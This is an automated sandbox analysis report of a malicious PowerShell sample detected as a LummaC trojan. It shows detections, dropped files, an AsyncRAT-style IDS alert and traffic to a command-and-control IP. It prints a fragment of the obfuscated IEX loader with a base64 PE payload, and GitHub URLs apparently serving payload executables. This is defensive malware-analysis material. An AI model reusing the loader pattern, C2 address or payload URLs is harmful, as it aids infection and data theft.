      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials213
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      62.122.184.98 (2).ps113%ReversingLabsScript-PowerShell.Trojan.LummaC
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          198.187.3.20.in-addr.arpa
          unknown
          unknownfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1385043036.00000180433F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://stackoverflow.com/q/14436606/23354RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllRegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://stackoverflow.com/q/2152978/23354rCannotRegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://go.micropowershell.exe, 00000000.00000002.1385043036.00000180427AF000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/11564914/23354;RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeRegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeRegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1385043036.00000180433F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.1406063961.0000018051A7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://oneget.orgXpowershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1385043036.00000180417F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1385043036.00000180417F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3802429612.0000000002FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1385043036.000001804327F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://oneget.orgpowershell.exe, 00000000.00000002.1385043036.00000180431AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    62.122.184.98
                                                    unknownunknown
                                                    49120GORSET-ASRUtrue
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1591130
                                                    Start date and time:2025-01-14 18:00:12 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 24s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:62.122.184.98 (2).ps1
                                                    Detection:MAL
                                                    Classification:mal92.spyw.evad.winPS1@4/7@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 50%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 371
                                                    • Number of non-executed functions: 2
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .ps1
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.246.45, 4.175.87.197, 20.3.187.198, 20.12.23.50
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target RegSvcs.exe, PID 7648 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    TimeTypeDescription
                                                    12:01:07API Interceptor9x Sleep call for process: powershell.exe modified
                                                    12:01:15API Interceptor12063842x Sleep call for process: RegSvcs.exe modified
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    s-part-0017.t-0009.t-msedge.net87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                    • 13.107.246.45
                                                    ithDgrzsHr.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.45
                                                    Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.45
                                                    http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    https://apple.com@jtkink.com/dff/ffd/qDy3TYxPfBVOljqb6egyT/YWRyaWFubWFyc2hAbmhzLm5ldA==Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.45
                                                    Payment Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 13.107.246.45
                                                    https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.246.45
                                                    tpmbypassprivatestore.exeGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.45
                                                    bg.microsoft.map.fastly.netWZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    ea354192.pdfGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 199.232.210.172
                                                    2.ps1Get hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    Payment Receipt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 199.232.214.172
                                                    AimPrivStoreAtt117.exeGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    email.emlGet hashmaliciousunknownBrowse
                                                    • 199.232.214.172
                                                    http://www.brillflooring.comGet hashmaliciousUnknownBrowse
                                                    • 199.232.214.172
                                                    final shipping documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 199.232.214.172
                                                    0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                    • 199.232.210.172
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    GORSET-ASRUtrow.exeGet hashmaliciousUnknownBrowse
                                                    • 62.122.190.121
                                                    pWz7aRypjY.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 62.122.184.144
                                                    sYYK13hD0c.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 62.122.184.144
                                                    yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                    • 62.122.190.121
                                                    XjlNeLcix5.exeGet hashmaliciousStealcBrowse
                                                    • 62.122.184.144
                                                    rmuVYJo33r.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 62.122.184.144
                                                    OW2Pw3W81N.exeGet hashmaliciousStealcBrowse
                                                    • 62.122.184.144
                                                    mJXdkcP4Wx.exeGet hashmaliciousStealcBrowse
                                                    • 62.122.184.144
                                                    ttFpxuMwKz.exeGet hashmaliciousStealcBrowse
                                                    • 62.122.184.144
                                                    gMkw55jZRs.exeGet hashmaliciousStealcBrowse
                                                    • 62.122.184.144
                                                    No context
                                                    No context
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):328
                                                    Entropy (8bit):3.2455963809668185
                                                    Encrypted:false
                                                    SSDEEP:6:kKS9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:FDImsLNkPlE99SNxAhUe/3
                                                    MD5:D682C99686968B845188D17E8A5EE93B
                                                    SHA1:44DE1C5F48845DB0F507CBF0F68AFEF7CD528229
                                                    SHA-256:D025DDAAAE54CD69CFB31E8A1C6FBFBF80D33317FD383523754BDF816A091FBB
                                                    SHA-512:D0EB98DC626A6936A71B3390A870AA91058E31D08229D7BB2E57CE0249D5C102572DCA91F09D0B5BD95C0D3ACBA4DECEE373C98C25DC9AF0F6EC540F4C568409
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:p...... ..........2.f..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1628158735648508
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulLhwlz:NllUO
                                                    MD5:F442CD24937ABD508058EA44FD91378E
                                                    SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                    SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                    SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6220
                                                    Entropy (8bit):3.7214701059890727
                                                    Encrypted:false
                                                    SSDEEP:48:rUEqdpCiU2bHbuwwukvhkvklCywssO+1HlUWfSogZo0MO+1HlZfSogZog1:ARdpCzQCgkvhkvCCttH1HgH+H1H+HP
                                                    MD5:AAA26EB21B8510A63A1CDDC4844F0416
                                                    SHA1:8824516844AD9E1F5DA0214E18232ADBE146974F
                                                    SHA-256:4573C392142874F98A6293602FCDE621B3EA8BC924037CA6E3FFDC81FBC20EAE
                                                    SHA-512:F7FE336A51F472C3E168A5080A884B2155A82D14134F2A3D0748B70ACE186849D9E977D5C8C2E26B6A6F41F4D985AC88F025322A5E1329FF9318BB4EB44EA0E4
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ....'GDj....`..f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...)..f..4...f......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Z!...........................=...A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......EWsG.Z................................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Z............................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Z.............................:-.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Z......................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Z......................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Z#.................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6220
                                                    Entropy (8bit):3.7214701059890727
                                                    Encrypted:false
                                                    SSDEEP:48:rUEqdpCiU2bHbuwwukvhkvklCywssO+1HlUWfSogZo0MO+1HlZfSogZog1:ARdpCzQCgkvhkvCCttH1HgH+H1H+HP
                                                    MD5:AAA26EB21B8510A63A1CDDC4844F0416
                                                    SHA1:8824516844AD9E1F5DA0214E18232ADBE146974F
                                                    SHA-256:4573C392142874F98A6293602FCDE621B3EA8BC924037CA6E3FFDC81FBC20EAE
                                                    SHA-512:F7FE336A51F472C3E168A5080A884B2155A82D14134F2A3D0748B70ACE186849D9E977D5C8C2E26B6A6F41F4D985AC88F025322A5E1329FF9318BB4EB44EA0E4
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ....'GDj....`..f..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...)..f..4...f......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Z!...........................=...A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......EWsG.Z................................R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Z............................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Z.............................:-.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Z......................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Z......................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Z#.................
                                                    File type:ASCII text, with very long lines (65483), with CRLF line terminators
                                                    Entropy (8bit):5.896775059511705
                                                    TrID:
                                                      File name:62.122.184.98 (2).ps1
                                                      File size:544'632 bytes
                                                      MD5:e2532dd0f68b37aedc1221fb6c805fdd
                                                      SHA1:5731ac07a4d04f30f9fdea33d9240a84a324576c
                                                      SHA256:2fbeb35402b8e7d05d2d1265de6b4645878698193024fa2c8e8e5ad86fb637e4
                                                      SHA512:be12574bdb95eecf5b1214261479a13a238f1538338e558d1c133c7c5669266b839e740846e7a08315620089b1144105429f10635c69a1c80ae2c1bcdb9cacc9
                                                      SSDEEP:12288:El1fOG2gogy1+tARiuKIGK31McrhU5fYyYa+:m8G2Xx1+UKcrGgyc
                                                      TLSH:D7C401321547BDCE8BBF1F49E98429A01C586177AB448094FDC907B952EF9208F7DEB8
                                                      File Content Preview:.. $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALlEXGcAAAAAAAAAAOA
                                                      Icon Hash:3270d6baae77db44
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-14T18:01:15.220753+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert162.122.184.9856001192.168.2.949775TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 14, 2025 18:01:14.272919893 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:14.277728081 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:14.277966976 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:14.298751116 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:14.303483009 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:14.379889965 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:14.384722948 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.081918001 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.081940889 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.082006931 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:15.209558010 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.215847015 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:15.220752954 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.431895971 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:15.480386972 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:16.797733068 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:16.802596092 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:16.802658081 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:16.807614088 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.294539928 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.299391985 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.299525976 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.304332972 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.680818081 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.730742931 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.867685080 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.918132067 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.938644886 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.943542957 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:36.943610907 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:36.948435068 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:37.629060030 CET5384653192.168.2.9162.159.36.2
                                                      Jan 14, 2025 18:01:37.633825064 CET5353846162.159.36.2192.168.2.9
                                                      Jan 14, 2025 18:01:37.635675907 CET5384653192.168.2.9162.159.36.2
                                                      Jan 14, 2025 18:01:37.641328096 CET5353846162.159.36.2192.168.2.9
                                                      Jan 14, 2025 18:01:38.182126045 CET5384653192.168.2.9162.159.36.2
                                                      Jan 14, 2025 18:01:38.187150955 CET5353846162.159.36.2192.168.2.9
                                                      Jan 14, 2025 18:01:38.187205076 CET5384653192.168.2.9162.159.36.2
                                                      Jan 14, 2025 18:01:41.074497938 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:41.121198893 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:41.265090942 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:41.308726072 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.309892893 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.314764023 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:56.314832926 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.319628954 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:56.696373940 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:56.746270895 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.863038063 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:56.892909050 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.897821903 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:01:56.897887945 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:01:56.902681112 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:07.090264082 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:07.136972904 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:07.269489050 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:07.324439049 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.313424110 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.318516016 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:16.318660021 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.323539972 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:16.697236061 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:16.746422052 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.860637903 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:16.863398075 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.868186951 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:16.868290901 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:16.873080969 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:33.106025934 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:33.152688980 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:33.305249929 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:33.355861902 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.325887918 CET4977556001192.168.2.962.122.184.98
                                                      Jan 14, 2025 18:02:36.330759048 CET560014977562.122.184.98192.168.2.9
                                                      Jan 14, 2025 18:02:36.330813885 CET4977556001192.168.2.962.122.184.98
